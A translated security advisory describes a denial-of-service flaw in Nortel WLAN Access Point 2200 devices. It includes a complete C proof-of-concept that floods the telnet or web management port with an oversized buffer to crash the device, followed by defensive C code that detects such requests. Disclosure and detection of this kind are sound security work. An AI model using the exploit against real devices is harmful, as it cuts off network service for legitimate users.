Nortel Wireless LAN Access Point 2200 Series Remote Denial of Service Vulnerability

Published: 2004-03-02
Updated: 2004-03-08

Affected systems:
Nortel Networks WLAN Access Point 2225
Nortel Networks WLAN Access Point 2221
Nortel Networks WLAN Access Point 2220
Description:
BUGTRAQ ID: 9787

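The Nortel Wireless LAN Access Point 2200 series is a family of wireless access devices.

The Nortel Wireless LAN Access Point 2200 series does not correctly handle oversized network requests. A remote attacker can exploit this flaw to cause a denial of service on the device.

The LAN AP 2200 permits arbitrary client-server communication, and by default the LAN uses ports 23 and 80 for management. An attacker who submits an oversized network request to the default management service of the wireless LAN access device can crash the wireless access service, which then stops responding to other legitimate users.

<*Source: Alex Hernandez (al3xhernandez@ureach.com)
  *>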

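Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

Mark Ludwik provided the following test method: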

/* WLAN-DoS.c
*
* Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
* discovered by Alex Hernandez.
*
* Copyright (C) 2004  Alex Hernandez.
*
* A successful attack on a vulnerable server can cause the AP
* (Access Point) listener to fail and crash. The port 23 (telnet)
* functionality cannot be restored until the listener is manually restarted.
*
* LAN AP 2200 permits client-server communication across any network.
* LAN enables by default the port 23 (telnet) and port (80) for administering.
* Debugging features are enabled by default, if LAN AP encounters such a request,
* it will crash and no longer field AP requests from authorized clients.
*
* Simple lame code by
*
* -Mark Ludwik :Germany
*
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy */
#include <unistd.h>      /* sleep, close */
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
  if(argc < 3) {
    printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
    printf("Usage: WlanDoS [AP/Host] [port]\n\n");
    exit(-1);
  }

  int sock;
  /* 2024 filler bytes plus the 8 trailing newlines; the buffer must hold
   * both, otherwise the memcpy below writes past the end of the array. */
  char explbuf[2024 + 8];
  struct sockaddr_in dest;
  struct hostent *he;

  if((he = gethostbyname(argv[1])) == NULL) {
    printf("Couldn't resolve %s!\n", argv[1]);
    exit(-1);
  }

  if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    perror("socket()");
    exit(-1);
  }

  printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");

  memset(&dest, 0, sizeof(dest));
  dest.sin_addr = *((struct in_addr *)he->h_addr);
  dest.sin_port = htons(atoi(argv[2]));
  dest.sin_family = AF_INET;

  printf("[+] Exploit buffer.\n");
  memset(explbuf, 'A', 2024);
  memcpy(explbuf+2024, "\n\n\n\n\n\n\n\n", 8);

  if(connect(sock, (struct sockaddr *)&dest, sizeof(dest)) == -1) {
    perror("connect()");
    exit(-1);
  }

  printf("[+] Connected...\n");
  printf("[+] Sending DoS attack...!\n");

  /* The buffer is not NUL-terminated, so pass its size, not strlen(). */
  send(sock, explbuf, sizeof(explbuf), 0);
  sleep(2);
  close(sock);
  printf("\n[+] Crash was successful !\n");
  return(0);
}

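Recommendation:
Vendor patch:

Nortel Networks
---------------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: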

http://www.nortelnetworks.com/index.html
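
With no vendor fix available, one way to spot the oversized management request described above is to track line length per connection on ports 23 and 80, since a single long line can arrive split across several TCP segments. The following C code is an added example, not part of the original advisory or any vendor code; the 1024-byte limit and the names flow_state, flow_feed and check_sample are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed limit, not from the advisory: set it above the longest line a
 * legitimate telnet or HTTP management client sends. */
#define MGMT_LINE_LIMIT 1024u

/* Per-connection state (hypothetical names). */
struct flow_state {
    size_t cur_line;  /* bytes received since the last CR or LF */
    size_t max_line;  /* longest line seen on this connection */
};

/* Feed one TCP segment's payload. Returns 1 once any line sent to a
 * management port (23 or 80, per the advisory) exceeds the limit, even
 * when that line is split across several segments. */
int flow_feed(struct flow_state *fs, uint16_t dport,
              const unsigned char *data, size_t len) {
    if (dport != 23 && dport != 80)
        return 0;
    for (size_t i = 0; i < len; i++) {
        if (data[i] == '\n' || data[i] == '\r')
            fs->cur_line = 0;
        else if (++fs->cur_line > fs->max_line)
            fs->max_line = fs->cur_line;
    }
    return fs->max_line > MGMT_LINE_LIMIT;
}

/* Constructed sample: one line of line_len filler bytes sent to dport in
 * segments of at most seg bytes, then a newline. Returns the verdict. */
int check_sample(uint16_t dport, size_t line_len, size_t seg) {
    unsigned char buf[512];
    struct flow_state fs = {0, 0};
    int alert = 0;
    memset(buf, 'A', sizeof buf);
    if (seg == 0 || seg > sizeof buf)
        seg = sizeof buf;
    while (line_len > 0) {
        size_t n = line_len < seg ? line_len : seg;
        alert |= flow_feed(&fs, dport, buf, n);
        line_len -= n;
    }
    alert |= flow_feed(&fs, dport, (const unsigned char *)"\n", 1);
    return alert;
}
```

A per-packet length check alone would miss a long line delivered in small segments; keeping state per connection is what catches it.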

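This security advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.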